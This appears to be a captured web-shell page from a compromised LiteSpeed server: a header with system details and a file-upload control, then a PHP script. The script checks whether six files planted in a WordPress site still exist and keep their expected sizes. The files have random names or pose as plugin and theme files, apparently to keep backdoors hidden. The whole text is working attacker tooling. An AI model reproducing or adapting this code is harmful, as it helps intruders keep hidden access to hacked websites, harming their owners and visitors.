|
Server : LiteSpeed System : Linux host 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64 User : idnco5810 ( 1093) PHP Version : 8.2.29 Disable Function : NONE Directory : /run/shm/ |
Upload File : |
<?php $r = '/home/netizen77.net/public_html'; $x = ["/wp-admin/yKzXacdNRem.php"=>"bd@@812@@45022",
"/wp-content/plugins/wordpress-seo/vendor_prefixed/symfony/deprecation-contracts/image.class.php"=>"bd@@3131@@957",
"/wp-content/themes/merah/inc/customizer/custom-controls/index.astra.customizer.control.base.php"=>"bd@@2635@@868",
"/wp-content/themes/merah/inc/lib/batch-processing/class.astra.wp.async.request.php"=>"bd@@2416@@1069",
"/wp-content/plugins/file-manager-advanced/application/svg-sanitizer/includes/phpunit/php-code-coverage/src/Report/action.transfer.php"=>"bd@@2218@@1014",
"/wp-content/plugins/file-manager-advanced/application/logs/class.filelogs.php"=>"bd@@3305@@884"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');